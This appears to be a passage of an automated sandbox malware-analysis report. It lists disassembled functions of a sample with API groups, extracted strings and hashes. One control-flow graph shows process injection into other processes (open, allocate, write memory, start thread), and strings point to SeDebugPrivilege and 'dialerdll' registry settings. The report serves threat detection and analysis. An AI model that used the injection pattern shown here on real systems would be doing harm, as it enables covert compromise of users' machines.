                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                  • String ID:
                                                                  • API String ID: 2718003287-0
                                                                  • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction ID: 2606ce5e1604f9996c77700c61670735bf026a26f6a8b0206751860bcd12478c
                                                                  • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                                  • Instruction Fuzzy Hash: 37D1AD32B08A808EEF11CFA9E4802DC3BF5F354B98F144216CF5997BA9EA34C45AD740
                                                                  Function 0000014ECB4A14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Free
                                                                  • String ID:
                                                                  • API String ID: 3168794593-0
                                                                  • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction ID: cb981b2c927b80340f727442a69f175b1a5c3fcf92e6e66e8fe4d8b69f4db14f
                                                                  • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                                  • Instruction Fuzzy Hash: 65012136618E90CADB44DF66F88419AB7E5F788F81F044425EF4993729EF38C455D740
                                                                  Function 0000014ECB4B2DB0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000014ECB4B2D9B), ref: 0000014ECB4B2ECC
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000014ECB4B2D9B), ref: 0000014ECB4B2F57
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorLastMode
                                                                  • String ID:
                                                                  • API String ID: 953036326-0
                                                                  • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction ID: fa883167bd0f39eab7330fdd754d9f7e680349b8f6c244053ea31aca32ffb997
                                                                  • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                                  • Instruction Fuzzy Hash: E391A172718A509DFF61DF6AA4C03EE7BE1B754B88F544109DF0A97AA9EB34C442E700
                                                                  Function 0000014ECB4A7D90 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                  • String ID:
                                                                  • API String ID: 2933794660-0
                                                                  • Opcode ID: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction ID: 8c3a64ffed7f3241deb6c345a5a1af3eaf3c4365081b12bddd74464ebd3714d6
                                                                  • Opcode Fuzzy Hash: 489f61d66183c236694581db33bccd4d3439c18b3469579d7712a38510163ede
                                                                  • Instruction Fuzzy Hash: CD112A36754F008AEF40DF61F8953E933A4F719B58F440E21DB6D86BA4EB78C1A89380
                                                                  Function 0000014ECB4A2604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction ID: 327cbeb1b25d94e30865976371b659ccb76cc1f76020cb7fc6fc26ad0746da85
                                                                  • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction Fuzzy Hash: 027191362087A14AEF24DF26A8C43EAB7D1F785B84F45011AEF4943BA9EF34C614E740
                                                                  Function 0000014ECB47A24C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CallTranslator
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 3163161869-2084237596
                                                                  • Opcode ID: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction ID: e64a2298cd41d3aec9e83a4837c59a2a93894ec0a3a689e10b0c32773893aaa2
                                                                  • Opcode Fuzzy Hash: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                                  • Instruction Fuzzy Hash: 6E615533608B848AEB20DF65E4803DD77E0F348B88F144215EF4967BA9EB78D595D700
                                                                  Function 0000014ECB4A23F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: FileType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 3081899298-91387939
                                                                  • Opcode ID: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction ID: 26a34ca8140d5b6782c837618b6e6f9492d47fe25b08c83a6f2827b2187dc893
                                                                  • Opcode Fuzzy Hash: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                                  • Instruction Fuzzy Hash: 9751AF3220C7A18AEE649B26B8E43EAB7D5F385780F440025DF4953BA9FB39C464F740
                                                                  Function 0000014ECB482DDB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: _log10_special
                                                                  • String ID: dll
                                                                  • API String ID: 3812965864-1037284150
                                                                  • Opcode ID: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction ID: 48cd718d08c447425f76de0a5c8bb0694ae89d13908c770e30d27bc986d47a7c
                                                                  • Opcode Fuzzy Hash: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction Fuzzy Hash: 3F61463192DF588CD9539BB9B8923A577987F527C5F41D307EA0AB1A72F7179043E200
                                                                  Function 0000014ECB4B2B20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID: U
                                                                  • API String ID: 442123175-4171548499
                                                                  • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction ID: 4cc2fea11d58c383f4b2d4d2e48675e1969bc90da95d5cd4ba07b5956df6ff6e
                                                                  • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction Fuzzy Hash: 30419F72218A408ADF60CF25F4853EA77A1F798794F804125EF4D877A8EF78C541D740
                                                                  Function 0000014ECB4A98D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFileHeaderRaise
                                                                  • String ID: csm
                                                                  • API String ID: 2573137834-1018135373
                                                                  • Opcode ID: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction ID: 916d00dec64bfa9cee5d0b927f8533ba1ce2f79c870591d517cd3f95bc3221f0
                                                                  • Opcode Fuzzy Hash: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction Fuzzy Hash: 6D11F832219B8496EB618F15F48039AB7E5F788B94F584225EF8D47B68EF3CC561DB00
                                                                  Function 0000014ECB477786 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: `vector constructor iterator'$ctor closure'
                                                                  • API String ID: 592178966-3792692944
                                                                  • Opcode ID: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction ID: e241aad1e42cceb9e8dc81d22c3b89081eecb76c870fab82fc01749aaf1efc11
                                                                  • Opcode Fuzzy Hash: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction Fuzzy Hash: 4FE08671A45B44D4DF018F22F4C02D833E0FB58B58B499122DB5C46361FA38D5E9C340
                                                                  Function 0000014ECB4777E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: ctor closure'$destructor iterator'
                                                                  • API String ID: 592178966-595914035
                                                                  • Opcode ID: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction ID: 9a78ed5e1ceb7082c07a5eaa5815447d9467fc6ed71737e5f97eefab74266bed
                                                                  • Opcode Fuzzy Hash: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction Fuzzy Hash: 5BE08671A05B44C4DF028F21E4C01D833A0F758B58B889122CB5C46361FA38D5E5C340
                                                                  Function 0000014ECB4778EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000003.1816877183.0000014ECB470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014ECB470000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_3_14ecb470000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: std::bad_alloc::bad_alloc
                                                                  • String ID: `scalar deleting destructor'$rFeaturePresent
                                                                  • API String ID: 1875163511-1689945142
                                                                  • Opcode ID: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction ID: e01fec8fdcd9795999e355c65041d5715ebd5fdcfa3ed192c2825a22ad945997
                                                                  • Opcode Fuzzy Hash: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction Fuzzy Hash: 2BD09E32219A849DEE10EB04F8C57C973B4F394309FD04411D34D819B5EF29CA8AE750
                                                                  Function 0000014ECB4A1C34 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 756756679-0
                                                                  • Opcode ID: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction ID: 03e36ff1f2ebdce795588aba2221a9ed4440791b52474e0c844943549e2df1d7
                                                                  • Opcode Fuzzy Hash: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction Fuzzy Hash: 75115735A09F9089EE048B67A8482A9B7E1FB89FD0F594128DF8D93735EF38D4529300
                                                                  Function 0000014ECB4A1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction ID: 3db712e85a20a2bbb1e1d20fb619cac631aa4e195e0f1b377965de5bea0f8112
                                                                  • Opcode Fuzzy Hash: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction Fuzzy Hash: 56E0ED71611A408AEB049F62E85C3A9B7E2FB88F56F45C024CB4947361EF7D84999750
                                                                  Function 0000014ECB4A1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000043.00000002.2003282746.0000014ECB4A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000014ECB4A0000, based on PE: true
                                                                  • Associated: 00000043.00000002.2002968935.0000014ECB4A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003349430.0000014ECB4B6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003375607.0000014ECB4C1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003398250.0000014ECB4C3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000043.00000002.2003420456.0000014ECB4C9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_67_2_14ecb4a0000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction ID: 714149d3e2afaf04e94105d74a5f745b9d9f92ff2202fda82418113139e2828f
                                                                  • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction Fuzzy Hash: 6DE012716119408BEB089F62E8483A9F7E2FB8CF16F448024CB0947321EE3C8499D710

                                                                  Callgraph

                                                                  Executed Functions

                                                                  Function 0000000140002D54 Relevance: 84.3, APIs: 36, Strings: 12, Instructions: 258registrymemorythreadCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Heap$Create$CloseValue$CurrentHandleQuery$AllocFileFreeOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustConvertErrorExecuteInformationLastLibraryLocalLookupMappingPrivilegePrivilegesShellSleepStringViewlstrcmpi
                                                                  • String ID: ?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE$SOFTWARE\dialerconfig$SeDebugPrivilege$dialerdll32$dialerdll64$kernel32.dll$ntdll.dll$open$pid$svc64
                                                                  • API String ID: 3658652915-98388624
                                                                  • Opcode ID: 511ba1f119688a7c2bce4f997cca157a19b0503c9fa3f0e54d5988af19886ff8
                                                                  • Instruction ID: 64b8ffd44a99f3ce8fcd0b7b346b5b7659867d38c7c320bcd7049fd2825a730f
                                                                  • Opcode Fuzzy Hash: 511ba1f119688a7c2bce4f997cca157a19b0503c9fa3f0e54d5988af19886ff8
                                                                  • Instruction Fuzzy Hash: C6C1F2F2200A4186EB26DF22F8547DA37A5F78CBD9F814116BB4A43A75DF38C589C744
                                                                  Function 0000000140001860 Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289memorystringnativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 45 140001860-1400018a2 OpenProcess 46 1400018a8-1400018bd IsWow64Process 45->46 47 140001cd0-140001cec 45->47 48 1400018cd 46->48 49 1400018bf-1400018cb 46->49 50 1400018d3-1400018df CloseHandle 48->50 49->50 50->47 51 1400018e5-1400018f0 50->51 51->47 52 1400018f6-14000190b 51->52 53 14000191d 52->53 54 14000190d-140001912 52->54 56 14000191f-140001921 53->56 54->47 55 140001918-14000191b 54->55 55->56 56->47 57 140001927-14000193d OpenProcess 56->57 57->47 58 140001943-14000195c OpenProcess 57->58 59 14000195e-140001975 K32GetModuleFileNameExW 58->59 60 1400019b0-1400019b3 58->60 63 1400019a7-1400019aa CloseHandle 59->63 64 140001977-140001992 PathFindFileNameW lstrlenW 59->64 61 140001a03-140001a22 NtQueryInformationProcess 60->61 62 1400019b5-1400019db 60->62 67 140001cc7-140001cca CloseHandle 61->67 68 140001a28-140001a2c 61->68 66 1400019df-1400019f1 StrCmpIW 62->66 63->60 64->63 65 140001994-1400019a4 StrCpyW 64->65 65->63 66->67 69 1400019f7-140001a01 66->69 67->47 68->67 70 140001a32-140001a4a OpenProcessToken 68->70 69->61 69->66 70->67 71 140001a50-140001a76 GetTokenInformation 70->71 72 140001af3 71->72 73 140001a78-140001a81 GetLastError 71->73 74 140001afa-140001b08 CloseHandle 72->74 73->72 75 140001a83-140001a97 LocalAlloc 73->75 74->67 76 140001b0e-140001b15 74->76 75->72 77 140001a99-140001abf GetTokenInformation 75->77 76->67 78 140001b1b-140001b26 76->78 79 140001ae1 77->79 80 140001ac1-140001adf GetSidSubAuthorityCount GetSidSubAuthority 77->80 78->67 81 140001b2c-140001b36 78->81 82 140001ae8-140001af1 LocalFree 79->82 80->82 83 140001b51 81->83 84 140001b38-140001b42 81->84 82->74 86 140001b55-140001b8d call 1400029ac * 3 83->86 84->67 85 140001b48-140001b4f 84->85 85->86 86->67 93 140001b93-140001bb2 call 1400029ac StrStrA 86->93 96 140001bb4-140001bc4 93->96 97 140001bcb-140001bf1 call 1400029ac * 2 93->97 96->93 98 140001bc6 96->98 97->67 103 140001bf7-140001c20 VirtualAllocEx 97->103 98->67 103->67 104 140001c26-140001c3f WriteProcessMemory 103->104 104->67 105 140001c45-140001c67 call 140002c04 104->105 105->67 108 140001c69-140001c71 105->108 108->67 109 140001c73-140001c80 WaitForSingleObject 108->109 110 140001c82-140001c96 GetExitCodeThread 109->110 111 140001cbc-140001cc1 CloseHandle 109->111 112 140001ca1-140001cba VirtualFreeEx 110->112 113 140001c98-140001c9e 110->113 111->67 112->111 113->112
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
